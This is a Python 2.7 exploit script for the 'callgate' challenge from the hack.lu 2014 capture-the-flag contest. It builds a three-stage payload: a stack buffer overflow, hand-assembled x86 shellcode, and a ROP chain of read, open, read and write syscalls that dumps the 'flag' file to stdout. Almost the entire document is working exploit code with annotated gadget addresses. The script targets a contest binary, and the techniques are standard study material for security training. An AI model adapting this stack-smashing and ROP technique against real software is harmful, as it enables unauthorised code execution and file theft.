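#!/usr/bin/python2.7 -u
# Exploit for "callgate" - hack.lu 2014
# By nsr from tasteless - www.tasteless.se
#
# Emits a three-part payload on stdout (presumably piped into the challenge
# service; `-u` keeps every write unbuffered, and send() flushes anyway):
#   1. a stack smash: 116 bytes of padding, a "push esp ; ... ; ret" gadget
#      that returns into the stack, then SHELLCODE. This only works because
#      the stack is executable on the target (the original author notes NX
#      is not in the way).
#   2. a ROP chain of four syscalls routed through the challenge's own
#      "call gate" code: read a filename from stdin, open it, read the file,
#      write it to stdout, exit.
#   3. the filename, "flag".
# Every address is hard-coded: the binary is non-PIE (0x0804xxxx text) and
# ADDR is a fixed stack address, so the target is assumed to run without
# ASLR. Adjust ADDR and the gadgets for any other build/environment.
import struct
import sys
import time

# Scratch buffer on the (fixed) stack used by every syscall in stage 2.
ADDR = 0xffff7800

# Gadgets in the challenge binary.
GADGET_PUSH_ESP_RET = 0x080483a6     # push esp ; jl 0x80483ab ; dec cl ; ret
GADGET_POP_EDI_EBP = 0x0804877d      # pop edi ; pop ebp ; ret
GADGET_POP_EBX_EDI_EBP = 0x0804877c  # pop ebx ; pop edi ; pop ebp ; ret
GADGET_MOV_EAX_EDI = 0x08048143      # mov eax, edi ; ret
GADGET_EXIT = 0x080483B7             # exit - "There's got to be time for that"
CALLGATE_SYSCALL = 0x07000004        # challenge code: syscall with "register frame"
CALLGATE_RET = 0x0700001a            # ret

# Stage-1 shellcode, x86-32. Decoded:
#   mov ebp, esp ; mov dword [esp], 0xdeadbeef ; mov dword [ebp+4], 1
#   mov dword [ebp+8], 0 ; mov dword [ebp+0xc], ebp-0x24
#   mov dword [ebp+0x10], 0x200 ; jmp 0x08048110
# It lays out a call frame on the stack and jumps into the binary at
# 0x08048110; presumably that routine then reads stage 2 into the stack
# (0x200 bytes into ebp-0x24) - confirm against the binary before reuse.
SHELLCODE = (b'\x89\xe5\xb8\xef\xbe\xad\xde\x89\x04\x24\xb8\x01\x00\x00\x00'
             b'\x89\x45\x04\x31\xc0\x89\x45\x08\x89\xe8\x83\xe8\x24\x89\x45'
             b'\x0c\xb8\x00\x02\x00\x00\x89\x45\x10\xb8\x10\x81\x04\x08\xff'
             b'\xe0')

# Bytes from the start of the overflowed buffer to the overwritten return address.
PADDING = 116


def p32(value):
    """Pack *value* as an unsigned 32-bit little-endian integer (bytes)."""
    return struct.pack('<I', value)


def syscall_frame(nr, ebx, ecx, edx):
    """Return one 40-byte stage-2 ROP frame that invokes syscall *nr*.

    Layout, in execution order:
      pop edi ; pop ebp ; ret            edi = nr, ebp = junk
      mov eax, edi ; ret                 eax = nr
      CALLGATE_SYSCALL                   the challenge's syscall trampoline;
                                         the three trailing dwords are its
                                         "register frame" (labelled ebx/ecx/edx
                                         by the original author - the gadget
                                         below pops them into ebx/edi/ebp, so
                                         the call gate itself must read the
                                         frame off the stack; verify)
      CALLGATE_RET                       ret into ...
      pop ebx ; pop edi ; pop ebp ; ret  ... which skips the 12 argument bytes
                                         so the chain continues with the next
                                         frame
    """
    return b''.join([
        p32(GADGET_POP_EDI_EBP),
        p32(nr),
        p32(0xdeadbeef),          # junk for ebp
        p32(GADGET_MOV_EAX_EDI),
        p32(CALLGATE_SYSCALL),
        p32(CALLGATE_RET),
        p32(GADGET_POP_EBX_EDI_EBP),
        p32(ebx),
        p32(ecx),
        p32(edx),
    ])


def build_stage1():
    """Overflow payload: padding, the push-esp gadget, then SHELLCODE.

    The gadget's conditional jump is not taken, so its `ret` pops the value
    just pushed (esp) into eip and execution lands on the top of the stack,
    which is under our control - hence the shellcode must be executable.
    """
    return b'A' * PADDING + p32(GADGET_PUSH_ESP_RET) + SHELLCODE


def build_stage2():
    """ROP chain: read the filename, open it, read it, write it out, exit.

    Syscall numbers are i386 Linux: 3 = read, 4 = write, 5 = open.
    The file is read from fd 4 on the assumption that open() returns it
    (0-2 are the std streams; 3 is presumably already taken by the service).
    write() always emits 0x50 bytes from ADDR, whatever read() returned, so
    stale stack bytes may follow the flag in the output.
    """
    chain = [
        syscall_frame(3, 0, ADDR, 0x10),     # read(stdin, ADDR, 16): filename from stage 3
        syscall_frame(5, ADDR, 0x2000, 10),  # open(ADDR, 0x2000, 10)
        syscall_frame(3, 4, ADDR, 0x50),     # read(4, ADDR, 80)
        syscall_frame(4, 1, ADDR, 0x50),     # write(stdout, ADDR, 80)
        p32(GADGET_EXIT),
    ]
    return b''.join(chain)


def send(line):
    """Write *line* followed by a newline as raw bytes, like `print line` on 2.7."""
    out = getattr(sys.stdout, 'buffer', sys.stdout)  # raw byte stream on Python 3
    out.write(line + b'\n')
    out.flush()


def main():
    send(b'#hello')          # valid file on the server
    send(build_stage1())
    time.sleep(1)            # crude sync: let stage 1 run before stage 2 arrives
    send(build_stage2())
    time.sleep(1)
    send(b'flag\x00')        # consumed by the first read() of stage 2


if __name__ == '__main__':
    main()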